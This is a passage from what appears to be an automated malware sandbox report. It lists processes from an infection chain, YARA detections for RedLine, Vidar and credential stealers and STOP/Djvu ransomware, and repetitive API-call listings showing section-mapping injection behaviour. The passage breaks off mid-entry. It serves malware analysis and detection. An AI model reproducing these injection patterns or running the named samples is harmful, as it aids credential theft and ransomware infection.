File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.2816735837.0000000000891000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	15:21:15
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Imagebase:	0x400000
File size:	413'696 bytes
MD5 hash:	22F2FD94F57B71F36A31EA18BE7D4B34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.2964943607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.2965262411.0000000000677000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.2966408279.0000000002456000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	15:21:16
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\5DA4.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\5DA4.exe
Imagebase:	0x7ff757eb0000
File size:	598'016 bytes
MD5 hash:	FF43AAE7083352DC2D8251C1E622C737
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	15:21:16
Start date:	13/10/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c tlatest.bat
Imagebase:	0x7ff6028a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	15:21:16
Start date:	13/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	39.2%
Total number of Nodes:	102
Total number of Limit Nodes:	4

Executed Functions

Function 00401590 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015CB Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 008F14B5 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008F14DD
Module32First.KERNEL32(00000000,00000224), ref: 008F14FD

Memory Dump Source

Source File: 00000000.00000002.2123714329.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ea000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: e84382713003c54e6f38397838b30ad93a001a3d4c1f346a37b2df88f90397ad
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 59F0C235100318ABDB202AF9988CA7A72EDFF98724F100528E753D25C0CA70E8454A65

Uniqueness

Uniqueness Score: -1.00%

Function 004029BA Relevance: 1.6, APIs: 1, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF

Uniqueness

Uniqueness Score: -1.00%

Function 0084003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0084024D

Strings

cess, xrefs: 0084018D
kernel32.dll, xrefs: 0084008F, 00840095

Memory Dump Source

Source File: 00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 96a40388b9270507752d7a06013d02a314efefd408bd225691babbdb7a835a92
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 1F526874A01229DFDB64CF58C984BA9BBB1FF09304F1480E9E54DAB251DB30AE85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 00840E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00840223,?,?), ref: 00840E19
SetErrorMode.KERNELBASE(00000000,?,?,00840223,?,?), ref: 00840E1E

Memory Dump Source

Source File: 00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 2f2d246c11f8448de6aec2b2e019bb55cea588eb2b381de00cadfc34988edbde
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 4FD0123114512C77D7002A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004029C5 Relevance: 1.6, APIs: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029D1 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004029D5 Relevance: 1.6, APIs: 1, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004029E2 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 004029E9 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029F9 Relevance: 1.5, APIs: 1, Instructions: 45
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00401969 Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401975 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040197F Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401986 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F

Uniqueness

Uniqueness Score: -1.00%

Function 008F1174 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008F11C5

Memory Dump Source

Source File: 00000000.00000002.2123714329.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ea000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 51f4c03c4348984fa8d91fb77aebb7cf5c4ab8fc3cd7fd71ee8385c9b5610a70
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D2112D79A00208EFDB01DF98C985E99BFF5EF08751F158094FA489B362D771EA50DB80

Uniqueness

Uniqueness Score: -1.00%

Function 004019A2 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.2123033267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
